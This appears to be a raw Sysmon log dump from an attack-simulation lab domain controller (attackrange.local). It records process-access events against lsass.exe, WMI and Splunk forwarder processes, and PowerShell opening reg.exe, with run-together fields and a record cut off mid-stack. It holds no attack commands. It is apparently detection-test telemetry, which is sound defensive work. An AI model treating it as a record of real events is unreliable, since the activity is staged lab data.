14:10:03.822{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204040Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.790{5ABCFE62-842F-603E-0F00-00000000AD01}2962052C:\Windows\system32\svchost.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204039Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204038Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.775{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204037Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-EA3B-6040-644E-00000000AD01}3716C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204036Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.759{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204035Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.759{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204034Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.759{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002204033Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.728{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAA84B32AC542B2D3BC453BC4F43A670,SHA256=F01F0EDC0307B12CDBBAFB69A9B8CEBC7CCC9567B61E3250D80AA252358237D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204032Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.509{5ABCFE62-EA3B-6040-634E-00000000AD01}46244112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204031Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA3B-6040-634E-00000000AD01}4624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204030Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204029Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204028Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204027Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204026Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA3B-6040-634E-00000000AD01}4624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204025Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.384{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA3B-6040-634E-00000000AD01}4624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204024Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.385{5ABCFE62-EA3B-6040-634E-00000000AD01}4624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204023Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7A0F4D90392A8401761DA4837CD6A40,SHA256=7CFDB1DB1A482BB430F009C1439475AA5047EB100DF7C779A0D48DCF94C1F1BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204451Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.853{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40149639F53EFE51E019D7069EC47B86,SHA256=B4A22EE07D642CD78914AFE592A2AF66ADF38128ABE0938D9766222861D208CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204450Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.697{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89922FFC15C12949C88C43C5FB5A5EA5,SHA256=502753DAA72197DEC6334D8E972D91340EFF62AE41F30A770E70E516E462246E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204449Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.400{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F23C2C845B3822AD6AB44DE04BC3B6A,SHA256=9B641A3A4207FAB56702A944A92AF5A3405D9FA5EEF0C6026BAAD6CF6E804A4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204448Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-EA3C-6040-664E-00000000AD01}4828C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204447Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204446Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204445Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204444Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204443Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-99F1-603E-7907-00000000AD01}30802060C:\Windows\system32\csrss.exe{5ABCFE62-EA3C-6040-664E-00000000AD01}4828C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204442Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.337{5ABCFE62-EA3C-6040-654E-00000000AD01}3763872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-EA3C-6040-664E-00000000AD01}4828C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d1532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492b